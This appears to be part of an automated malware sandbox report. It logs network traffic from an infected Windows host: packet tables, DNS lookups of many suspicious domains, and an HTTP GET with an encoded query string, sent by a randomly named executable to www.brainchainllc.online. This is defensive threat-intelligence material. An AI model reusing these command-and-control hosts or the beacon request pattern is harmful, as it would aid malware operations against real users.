                                              Sep 24, 2024 11:30:26.142749071 CEST4995680192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:30:26.154400110 CEST4995680192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:30:26.488246918 CEST804995613.76.137.44192.168.11.30
                                              Sep 24, 2024 11:30:26.675681114 CEST804995613.76.137.44192.168.11.30
                                              Sep 24, 2024 11:30:26.675693989 CEST804995613.76.137.44192.168.11.30
                                              Sep 24, 2024 11:30:26.675865889 CEST4995680192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:30:27.664150953 CEST4995680192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:30:28.682708025 CEST4995780192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:30:29.029428005 CEST804995713.76.137.44192.168.11.30
                                              Sep 24, 2024 11:30:29.029638052 CEST4995780192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:30:29.041012049 CEST4995780192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:30:29.387502909 CEST804995713.76.137.44192.168.11.30
                                              Sep 24, 2024 11:30:29.574621916 CEST804995713.76.137.44192.168.11.30
                                              Sep 24, 2024 11:30:29.574635983 CEST804995713.76.137.44192.168.11.30
                                              Sep 24, 2024 11:30:29.574779034 CEST4995780192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:30:30.554071903 CEST4995780192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:30:31.573410988 CEST4995880192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:30:31.919848919 CEST804995813.76.137.44192.168.11.30
                                              Sep 24, 2024 11:30:31.920232058 CEST4995880192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:30:31.930614948 CEST4995880192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:30:31.930636883 CEST4995880192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:30:31.930702925 CEST4995880192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:30:32.276601076 CEST804995813.76.137.44192.168.11.30
                                              Sep 24, 2024 11:30:32.276614904 CEST804995813.76.137.44192.168.11.30
                                              Sep 24, 2024 11:30:32.276624918 CEST804995813.76.137.44192.168.11.30
                                              Sep 24, 2024 11:30:32.464014053 CEST804995813.76.137.44192.168.11.30
                                              Sep 24, 2024 11:30:32.464086056 CEST804995813.76.137.44192.168.11.30
                                              Sep 24, 2024 11:30:32.464262962 CEST4995880192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:30:33.444168091 CEST4995880192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:30:34.462542057 CEST4995980192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:30:34.808224916 CEST804995913.76.137.44192.168.11.30
                                              Sep 24, 2024 11:30:34.808460951 CEST4995980192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:30:34.816750050 CEST4995980192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:30:35.161854982 CEST804995913.76.137.44192.168.11.30
                                              Sep 24, 2024 11:30:35.349067926 CEST804995913.76.137.44192.168.11.30
                                              Sep 24, 2024 11:30:35.349152088 CEST804995913.76.137.44192.168.11.30
                                              Sep 24, 2024 11:30:35.349386930 CEST4995980192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:30:35.354078054 CEST4995980192.168.11.3013.76.137.44
                                              Sep 24, 2024 11:30:35.699215889 CEST804995913.76.137.44192.168.11.30
                                              Sep 24, 2024 11:30:40.367297888 CEST4996080192.168.11.303.33.130.190
                                              Sep 24, 2024 11:30:40.469189882 CEST80499603.33.130.190192.168.11.30
                                              Sep 24, 2024 11:30:40.469362020 CEST4996080192.168.11.303.33.130.190
                                              Sep 24, 2024 11:30:40.482191086 CEST4996080192.168.11.303.33.130.190
                                              Sep 24, 2024 11:30:40.584038019 CEST80499603.33.130.190192.168.11.30
                                              Sep 24, 2024 11:30:40.586136103 CEST80499603.33.130.190192.168.11.30
                                              Sep 24, 2024 11:30:40.586244106 CEST4996080192.168.11.303.33.130.190
                                              Sep 24, 2024 11:30:41.988996983 CEST4996080192.168.11.303.33.130.190
                                              Sep 24, 2024 11:30:42.090769053 CEST80499603.33.130.190192.168.11.30
                                              Sep 24, 2024 11:30:43.007745028 CEST4996180192.168.11.303.33.130.190
                                              Sep 24, 2024 11:30:43.109621048 CEST80499613.33.130.190192.168.11.30
                                              Sep 24, 2024 11:30:43.109824896 CEST4996180192.168.11.303.33.130.190
                                              Sep 24, 2024 11:30:43.118777037 CEST4996180192.168.11.303.33.130.190
                                              Sep 24, 2024 11:30:43.220633030 CEST80499613.33.130.190192.168.11.30
                                              Sep 24, 2024 11:30:43.222634077 CEST80499613.33.130.190192.168.11.30
                                              Sep 24, 2024 11:30:43.222873926 CEST4996180192.168.11.303.33.130.190
                                              Sep 24, 2024 11:30:44.629081964 CEST4996180192.168.11.303.33.130.190
                                              Sep 24, 2024 11:30:44.730916977 CEST80499613.33.130.190192.168.11.30
                                              Sep 24, 2024 11:30:45.647713900 CEST4996280192.168.11.303.33.130.190
                                              Sep 24, 2024 11:30:45.749639034 CEST80499623.33.130.190192.168.11.30
                                              Sep 24, 2024 11:30:45.749809980 CEST4996280192.168.11.303.33.130.190
                                              Sep 24, 2024 11:30:45.760525942 CEST4996280192.168.11.303.33.130.190
                                              Sep 24, 2024 11:30:45.760596037 CEST4996280192.168.11.303.33.130.190
                                              Sep 24, 2024 11:30:45.862410069 CEST80499623.33.130.190192.168.11.30
                                              Sep 24, 2024 11:30:45.862495899 CEST80499623.33.130.190192.168.11.30
                                              Sep 24, 2024 11:30:45.862508059 CEST80499623.33.130.190192.168.11.30
                                              Sep 24, 2024 11:30:45.862607956 CEST80499623.33.130.190192.168.11.30
                                              Sep 24, 2024 11:30:45.864092112 CEST80499623.33.130.190192.168.11.30
                                              Sep 24, 2024 11:30:45.864258051 CEST4996280192.168.11.303.33.130.190
                                              Sep 24, 2024 11:30:47.269011021 CEST4996280192.168.11.303.33.130.190
                                              Sep 24, 2024 11:30:47.370817900 CEST80499623.33.130.190192.168.11.30
                                              Sep 24, 2024 11:30:48.287657976 CEST4996380192.168.11.303.33.130.190
                                              Sep 24, 2024 11:30:48.389524937 CEST80499633.33.130.190192.168.11.30
                                              Sep 24, 2024 11:30:48.389669895 CEST4996380192.168.11.303.33.130.190
                                              Sep 24, 2024 11:30:48.397658110 CEST4996380192.168.11.303.33.130.190
                                              Sep 24, 2024 11:30:48.499454975 CEST80499633.33.130.190192.168.11.30
                                              Sep 24, 2024 11:30:48.502226114 CEST80499633.33.130.190192.168.11.30
                                              Sep 24, 2024 11:30:48.502239943 CEST80499633.33.130.190192.168.11.30
                                              Sep 24, 2024 11:30:48.502537966 CEST4996380192.168.11.303.33.130.190
                                              Sep 24, 2024 11:30:48.505501986 CEST4996380192.168.11.303.33.130.190
                                              Sep 24, 2024 11:30:48.513619900 CEST80499633.33.130.190192.168.11.30
                                              Sep 24, 2024 11:30:48.513883114 CEST4996380192.168.11.303.33.130.190
                                              Sep 24, 2024 11:30:48.607254982 CEST80499633.33.130.190192.168.11.30
                                              Sep 24, 2024 11:31:01.690644979 CEST4996480192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:31:01.843863010 CEST8049964172.81.61.224192.168.11.30
                                              Sep 24, 2024 11:31:01.844198942 CEST4996480192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:31:01.855554104 CEST4996480192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:31:02.008678913 CEST8049964172.81.61.224192.168.11.30
                                              Sep 24, 2024 11:31:02.009377956 CEST8049964172.81.61.224192.168.11.30
                                              Sep 24, 2024 11:31:02.009495020 CEST8049964172.81.61.224192.168.11.30
                                              Sep 24, 2024 11:31:02.009651899 CEST4996480192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:31:03.359246016 CEST4996480192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:31:04.377578020 CEST4996580192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:31:04.531431913 CEST8049965172.81.61.224192.168.11.30
                                              Sep 24, 2024 11:31:04.531644106 CEST4996580192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:31:04.541949034 CEST4996580192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:31:04.702215910 CEST8049965172.81.61.224192.168.11.30
                                              Sep 24, 2024 11:31:04.704819918 CEST8049965172.81.61.224192.168.11.30
                                              Sep 24, 2024 11:31:04.704909086 CEST8049965172.81.61.224192.168.11.30
                                              Sep 24, 2024 11:31:04.705092907 CEST4996580192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:31:06.046040058 CEST4996580192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:31:07.064450979 CEST4996680192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:31:07.221018076 CEST8049966172.81.61.224192.168.11.30
                                              Sep 24, 2024 11:31:07.221180916 CEST4996680192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:31:07.230856895 CEST4996680192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:31:07.230916023 CEST4996680192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:31:07.387563944 CEST8049966172.81.61.224192.168.11.30
                                              Sep 24, 2024 11:31:07.387655973 CEST8049966172.81.61.224192.168.11.30
                                              Sep 24, 2024 11:31:07.387666941 CEST8049966172.81.61.224192.168.11.30
                                              Sep 24, 2024 11:31:07.388753891 CEST8049966172.81.61.224192.168.11.30
                                              Sep 24, 2024 11:31:07.388849020 CEST8049966172.81.61.224192.168.11.30
                                              Sep 24, 2024 11:31:07.389014959 CEST4996680192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:31:08.732925892 CEST4996680192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:31:09.751657009 CEST4996780192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:31:09.905145884 CEST8049967172.81.61.224192.168.11.30
                                              Sep 24, 2024 11:31:09.905298948 CEST4996780192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:31:09.912312031 CEST4996780192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:31:10.065902948 CEST8049967172.81.61.224192.168.11.30
                                              Sep 24, 2024 11:31:10.066571951 CEST8049967172.81.61.224192.168.11.30
                                              Sep 24, 2024 11:31:10.066587925 CEST8049967172.81.61.224192.168.11.30
                                              Sep 24, 2024 11:31:10.066839933 CEST4996780192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:31:10.069479942 CEST4996780192.168.11.30172.81.61.224
                                              Sep 24, 2024 11:31:10.223093033 CEST8049967172.81.61.224192.168.11.30
                                              Sep 24, 2024 11:31:15.078125000 CEST4996880192.168.11.30134.119.247.136
                                              Sep 24, 2024 11:31:15.268748045 CEST8049968134.119.247.136192.168.11.30
                                              Sep 24, 2024 11:31:15.268996954 CEST4996880192.168.11.30134.119.247.136
                                              Sep 24, 2024 11:31:15.279637098 CEST4996880192.168.11.30134.119.247.136
                                              Sep 24, 2024 11:31:15.470046043 CEST8049968134.119.247.136192.168.11.30
                                              Sep 24, 2024 11:31:15.473572016 CEST8049968134.119.247.136192.168.11.30
                                              Sep 24, 2024 11:31:15.473586082 CEST8049968134.119.247.136192.168.11.30
                                              Sep 24, 2024 11:31:15.473735094 CEST4996880192.168.11.30134.119.247.136
                                              Sep 24, 2024 11:31:16.793565989 CEST4996880192.168.11.30134.119.247.136
                                              Sep 24, 2024 11:31:17.812203884 CEST4996980192.168.11.30134.119.247.136
                                              Sep 24, 2024 11:31:18.006469011 CEST8049969134.119.247.136192.168.11.30
                                              Sep 24, 2024 11:31:18.006855965 CEST4996980192.168.11.30134.119.247.136
                                              Sep 24, 2024 11:31:18.018513918 CEST4996980192.168.11.30134.119.247.136
                                              Sep 24, 2024 11:31:18.212635994 CEST8049969134.119.247.136192.168.11.30
                                              Sep 24, 2024 11:31:18.214925051 CEST8049969134.119.247.136192.168.11.30
                                              Sep 24, 2024 11:31:18.214941978 CEST8049969134.119.247.136192.168.11.30
                                              Sep 24, 2024 11:31:18.215081930 CEST4996980192.168.11.30134.119.247.136
                                              Sep 24, 2024 11:31:19.527311087 CEST4996980192.168.11.30134.119.247.136
                                              Sep 24, 2024 11:31:20.545564890 CEST4997080192.168.11.30134.119.247.136
                                              Sep 24, 2024 11:31:20.739522934 CEST8049970134.119.247.136192.168.11.30
                                              Sep 24, 2024 11:31:20.739737034 CEST4997080192.168.11.30134.119.247.136
                                              Sep 24, 2024 11:31:20.750449896 CEST4997080192.168.11.30134.119.247.136
                                              Sep 24, 2024 11:31:20.944561005 CEST8049970134.119.247.136192.168.11.30
                                              Sep 24, 2024 11:31:20.944572926 CEST8049970134.119.247.136192.168.11.30
                                              Sep 24, 2024 11:31:20.946923971 CEST8049970134.119.247.136192.168.11.30
                                              Sep 24, 2024 11:31:20.946934938 CEST8049970134.119.247.136192.168.11.30
                                              Sep 24, 2024 11:31:20.947051048 CEST4997080192.168.11.30134.119.247.136
                                              Sep 24, 2024 11:31:22.261085987 CEST4997080192.168.11.30134.119.247.136
                                              Sep 24, 2024 11:31:23.279706955 CEST4997180192.168.11.30134.119.247.136
                                              Sep 24, 2024 11:31:23.469979048 CEST8049971134.119.247.136192.168.11.30
                                              Sep 24, 2024 11:31:23.470212936 CEST4997180192.168.11.30134.119.247.136
                                              Sep 24, 2024 11:31:23.479537964 CEST4997180192.168.11.30134.119.247.136
                                              Sep 24, 2024 11:31:23.669636011 CEST8049971134.119.247.136192.168.11.30
                                              Sep 24, 2024 11:31:23.672920942 CEST8049971134.119.247.136192.168.11.30
                                              Sep 24, 2024 11:31:23.673224926 CEST4997180192.168.11.30134.119.247.136
                                              Sep 24, 2024 11:31:23.676014900 CEST4997180192.168.11.30134.119.247.136
                                              Sep 24, 2024 11:31:23.866132975 CEST8049971134.119.247.136192.168.11.30

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 24, 2024 11:25:41.459330082 CEST6529253192.168.11.301.1.1.1
                                              Sep 24, 2024 11:25:41.737786055 CEST53652921.1.1.1192.168.11.30
                                              Sep 24, 2024 11:26:11.529361010 CEST5594653192.168.11.301.1.1.1
                                              Sep 24, 2024 11:26:11.685168028 CEST53559461.1.1.1192.168.11.30
                                              Sep 24, 2024 11:26:27.940186977 CEST5226253192.168.11.301.1.1.1
                                              Sep 24, 2024 11:26:28.314277887 CEST53522621.1.1.1192.168.11.30
                                              Sep 24, 2024 11:26:42.640321970 CEST6275853192.168.11.301.1.1.1
                                              Sep 24, 2024 11:26:42.754976988 CEST53627581.1.1.1192.168.11.30
                                              Sep 24, 2024 11:26:56.246658087 CEST5991953192.168.11.301.1.1.1
                                              Sep 24, 2024 11:26:56.405564070 CEST53599191.1.1.1192.168.11.30
                                              Sep 24, 2024 11:27:10.932049036 CEST5968853192.168.11.301.1.1.1
                                              Sep 24, 2024 11:27:11.047458887 CEST53596881.1.1.1192.168.11.30
                                              Sep 24, 2024 11:27:24.209243059 CEST6252653192.168.11.301.1.1.1
                                              Sep 24, 2024 11:27:24.319751024 CEST53625261.1.1.1192.168.11.30
                                              Sep 24, 2024 11:27:32.379848003 CEST5581753192.168.11.301.1.1.1
                                              Sep 24, 2024 11:27:32.494642973 CEST53558171.1.1.1192.168.11.30
                                              Sep 24, 2024 11:27:45.891769886 CEST5902553192.168.11.301.1.1.1
                                              Sep 24, 2024 11:27:46.006047010 CEST53590251.1.1.1192.168.11.30
                                              Sep 24, 2024 11:27:59.623792887 CEST6386653192.168.11.301.1.1.1
                                              Sep 24, 2024 11:27:59.798964977 CEST53638661.1.1.1192.168.11.30
                                              Sep 24, 2024 11:27:59.799324036 CEST6386653192.168.11.309.9.9.9
                                              Sep 24, 2024 11:27:59.917879105 CEST53638669.9.9.9192.168.11.30
                                              Sep 24, 2024 11:28:07.980376005 CEST5000153192.168.11.301.1.1.1
                                              Sep 24, 2024 11:28:08.992578030 CEST5000153192.168.11.309.9.9.9
                                              Sep 24, 2024 11:28:09.220923901 CEST53500011.1.1.1192.168.11.30
                                              Sep 24, 2024 11:28:09.531526089 CEST53500019.9.9.9192.168.11.30
                                              Sep 24, 2024 11:28:23.758023977 CEST5049653192.168.11.301.1.1.1
                                              Sep 24, 2024 11:28:24.031963110 CEST53504961.1.1.1192.168.11.30
                                              Sep 24, 2024 11:28:37.208662033 CEST5146053192.168.11.301.1.1.1
                                              Sep 24, 2024 11:28:37.848706007 CEST53514601.1.1.1192.168.11.30
                                              Sep 24, 2024 11:28:51.689397097 CEST5574953192.168.11.301.1.1.1
                                              Sep 24, 2024 11:28:52.144521952 CEST53557491.1.1.1192.168.11.30
                                              Sep 24, 2024 11:29:05.811402082 CEST5809853192.168.11.301.1.1.1
                                              Sep 24, 2024 11:29:05.925887108 CEST53580981.1.1.1192.168.11.30
                                              Sep 24, 2024 11:29:20.092875004 CEST6080353192.168.11.301.1.1.1
                                              Sep 24, 2024 11:29:20.320343018 CEST53608031.1.1.1192.168.11.30
                                              Sep 24, 2024 11:29:34.789051056 CEST5536253192.168.11.301.1.1.1
                                              Sep 24, 2024 11:29:35.163533926 CEST53553621.1.1.1192.168.11.30
                                              Sep 24, 2024 11:30:53.519515038 CEST5788953192.168.11.301.1.1.1
                                              Sep 24, 2024 11:30:53.631144047 CEST53578891.1.1.1192.168.11.30
                                              Sep 24, 2024 11:31:28.683022976 CEST5632953192.168.11.301.1.1.1
                                              Sep 24, 2024 11:31:28.887465954 CEST53563291.1.1.1192.168.11.30
                                              Sep 24, 2024 11:31:28.887768984 CEST5632953192.168.11.309.9.9.9
                                              Sep 24, 2024 11:31:28.998990059 CEST53563299.9.9.9192.168.11.30

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Sep 24, 2024 11:25:41.459330082 CEST192.168.11.301.1.1.10xc3a5Standard query (0)wamuk.orgA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:26:11.529361010 CEST192.168.11.301.1.1.10x195Standard query (0)www.brainchainllc.onlineA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:26:27.940186977 CEST192.168.11.301.1.1.10x60fStandard query (0)www.wdcb30.topA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:26:42.640321970 CEST192.168.11.301.1.1.10x6d9cStandard query (0)www.onetoph.xyzA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:26:56.246658087 CEST192.168.11.301.1.1.10x827bStandard query (0)www.52ywq.vipA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:27:10.932049036 CEST192.168.11.301.1.1.10x74f3Standard query (0)www.leadlikeyoumeanit.xyzA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:27:24.209243059 CEST192.168.11.301.1.1.10x290eStandard query (0)www.useanecdotenow.techA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:27:32.379848003 CEST192.168.11.301.1.1.10x87c8Standard query (0)www.moritynomxd.xyzA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:27:45.891769886 CEST192.168.11.301.1.1.10x3294Standard query (0)www.new-wellness.netA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:27:59.623792887 CEST192.168.11.301.1.1.10x64e5Standard query (0)www.gerakankoreri.netA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:27:59.799324036 CEST192.168.11.309.9.9.90x64e5Standard query (0)www.gerakankoreri.netA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:28:07.980376005 CEST192.168.11.301.1.1.10x45f2Standard query (0)www.inf30027group23.xyzA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:28:08.992578030 CEST192.168.11.309.9.9.90x45f2Standard query (0)www.inf30027group23.xyzA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:28:23.758023977 CEST192.168.11.301.1.1.10x60baStandard query (0)www.rmgltd.servicesA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:28:37.208662033 CEST192.168.11.301.1.1.10xd49eStandard query (0)www.mfgarage.netA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:28:51.689397097 CEST192.168.11.301.1.1.10x2953Standard query (0)www.chalet-tofane.netA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:29:05.811402082 CEST192.168.11.301.1.1.10xdf5eStandard query (0)www.tracy.clubA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:29:20.092875004 CEST192.168.11.301.1.1.10x380aStandard query (0)www.prj81oqde1.buzzA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:29:34.789051056 CEST192.168.11.301.1.1.10xca5eStandard query (0)www.wdeb18.topA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:30:53.519515038 CEST192.168.11.301.1.1.10x7ec6Standard query (0)www.useanecdotenow.techA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:31:28.683022976 CEST192.168.11.301.1.1.10x1024Standard query (0)www.gerakankoreri.netA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:31:28.887768984 CEST192.168.11.309.9.9.90x1024Standard query (0)www.gerakankoreri.netA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Sep 24, 2024 11:25:41.737786055 CEST1.1.1.1192.168.11.300xc3a5No error (0)wamuk.org162.213.195.46A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:26:11.685168028 CEST1.1.1.1192.168.11.300x195No error (0)www.brainchainllc.online208.91.197.27A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:26:28.314277887 CEST1.1.1.1192.168.11.300x60fNo error (0)www.wdcb30.topwdcb30.topCNAME (Canonical name)IN (0x0001)false
                                              Sep 24, 2024 11:26:28.314277887 CEST1.1.1.1192.168.11.300x60fNo error (0)wdcb30.top206.119.82.131A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:26:42.754976988 CEST1.1.1.1192.168.11.300x6d9cNo error (0)www.onetoph.xyz209.74.95.29A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:26:56.405564070 CEST1.1.1.1192.168.11.300x827bNo error (0)www.52ywq.vip2rqff6.zxy-cname.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 24, 2024 11:26:56.405564070 CEST1.1.1.1192.168.11.300x827bNo error (0)2rqff6.zxy-cname.comxzwp.g.zxy-cname.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 24, 2024 11:26:56.405564070 CEST1.1.1.1192.168.11.300x827bNo error (0)xzwp.g.zxy-cname.com13.76.137.44A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:26:56.405564070 CEST1.1.1.1192.168.11.300x827bNo error (0)xzwp.g.zxy-cname.com52.230.28.86A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:26:56.405564070 CEST1.1.1.1192.168.11.300x827bNo error (0)xzwp.g.zxy-cname.com52.187.43.40A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:26:56.405564070 CEST1.1.1.1192.168.11.300x827bNo error (0)xzwp.g.zxy-cname.com13.76.139.81A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:26:56.405564070 CEST1.1.1.1192.168.11.300x827bNo error (0)xzwp.g.zxy-cname.com52.187.42.58A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:26:56.405564070 CEST1.1.1.1192.168.11.300x827bNo error (0)xzwp.g.zxy-cname.com52.187.43.73A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:27:11.047458887 CEST1.1.1.1192.168.11.300x74f3No error (0)www.leadlikeyoumeanit.xyzleadlikeyoumeanit.xyzCNAME (Canonical name)IN (0x0001)false
                                              Sep 24, 2024 11:27:11.047458887 CEST1.1.1.1192.168.11.300x74f3No error (0)leadlikeyoumeanit.xyz3.33.130.190A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:27:11.047458887 CEST1.1.1.1192.168.11.300x74f3No error (0)leadlikeyoumeanit.xyz15.197.148.33A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:27:24.319751024 CEST1.1.1.1192.168.11.300x290eName error (3)www.useanecdotenow.technonenoneA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:27:32.494642973 CEST1.1.1.1192.168.11.300x87c8No error (0)www.moritynomxd.xyz172.81.61.224A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:27:46.006047010 CEST1.1.1.1192.168.11.300x3294No error (0)www.new-wellness.net134.119.247.136A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:27:59.798964977 CEST1.1.1.1192.168.11.300x64e5Server failure (2)www.gerakankoreri.netnonenoneA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:27:59.917879105 CEST9.9.9.9192.168.11.300x64e5Server failure (2)www.gerakankoreri.netnonenoneA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:28:09.220923901 CEST1.1.1.1192.168.11.300x45f2No error (0)www.inf30027group23.xyzinf30027group23.xyzCNAME (Canonical name)IN (0x0001)false
                                              Sep 24, 2024 11:28:09.220923901 CEST1.1.1.1192.168.11.300x45f2No error (0)inf30027group23.xyz221.121.144.149A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:28:09.531526089 CEST9.9.9.9192.168.11.300x45f2No error (0)www.inf30027group23.xyzinf30027group23.xyzCNAME (Canonical name)IN (0x0001)false
                                              Sep 24, 2024 11:28:09.531526089 CEST9.9.9.9192.168.11.300x45f2No error (0)inf30027group23.xyz221.121.144.149A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:28:24.031963110 CEST1.1.1.1192.168.11.300x60baNo error (0)www.rmgltd.servicesrmgltd.servicesCNAME (Canonical name)IN (0x0001)false
                                              Sep 24, 2024 11:28:24.031963110 CEST1.1.1.1192.168.11.300x60baNo error (0)rmgltd.services3.33.130.190A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:28:24.031963110 CEST1.1.1.1192.168.11.300x60baNo error (0)rmgltd.services15.197.148.33A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:28:37.848706007 CEST1.1.1.1192.168.11.300xd49eNo error (0)www.mfgarage.net85.153.138.113A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:28:52.144521952 CEST1.1.1.1192.168.11.300x2953No error (0)www.chalet-tofane.netchalet-tofane.netCNAME (Canonical name)IN (0x0001)false
                                              Sep 24, 2024 11:28:52.144521952 CEST1.1.1.1192.168.11.300x2953No error (0)chalet-tofane.net62.149.128.40A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:29:05.925887108 CEST1.1.1.1192.168.11.300xdf5eNo error (0)www.tracy.clubtracy.clubCNAME (Canonical name)IN (0x0001)false
                                              Sep 24, 2024 11:29:05.925887108 CEST1.1.1.1192.168.11.300xdf5eNo error (0)tracy.club3.33.130.190A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:29:05.925887108 CEST1.1.1.1192.168.11.300xdf5eNo error (0)tracy.club15.197.148.33A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:29:20.320343018 CEST1.1.1.1192.168.11.300x380aNo error (0)www.prj81oqde1.buzz154.212.219.2A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:29:35.163533926 CEST1.1.1.1192.168.11.300xca5eNo error (0)www.wdeb18.topwdeb18.topCNAME (Canonical name)IN (0x0001)false
                                              Sep 24, 2024 11:29:35.163533926 CEST1.1.1.1192.168.11.300xca5eNo error (0)wdeb18.top206.119.82.147A (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:30:53.631144047 CEST1.1.1.1192.168.11.300x7ec6Name error (3)www.useanecdotenow.technonenoneA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:31:28.887465954 CEST1.1.1.1192.168.11.300x1024Server failure (2)www.gerakankoreri.netnonenoneA (IP address)IN (0x0001)false
                                              Sep 24, 2024 11:31:28.998990059 CEST9.9.9.9192.168.11.300x1024Server failure (2)www.gerakankoreri.netnonenoneA (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • wamuk.org
                                              • www.brainchainllc.online
                                              • www.wdcb30.top
                                              • www.onetoph.xyz
                                              • www.52ywq.vip
                                              • www.leadlikeyoumeanit.xyz
                                              • www.moritynomxd.xyz
                                              • www.new-wellness.net
                                              • www.inf30027group23.xyz
                                              • www.rmgltd.services
                                              • www.mfgarage.net
                                              • www.chalet-tofane.net
                                              • www.tracy.club
                                              • www.prj81oqde1.buzz
                                              • www.wdeb18.top

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.11.3049893208.91.197.27804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:26:11.830647945 CEST500OUTGET /4cb1/?7LY=XKNL1JD0m+kPKiRtwXvWadxi4lw/eMGyyubvbAiHS0Pw7N/QTVJnoSWf0VV+PqGNlgPtrFtsvm+9H+6jxRgj1ZWpayRlysea5sKDxNVo6arBefmKhfjh+4M=&Nze=C0klVT HTTP/1.1
                                              Host: www.brainchainllc.online
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:26:12.612413883 CEST850INHTTP/1.1 200 OK
                                              Date: Tue, 24 Sep 2024 09:26:11 GMT
                                              Server: Apache
                                              Referrer-Policy: no-referrer-when-downgrade
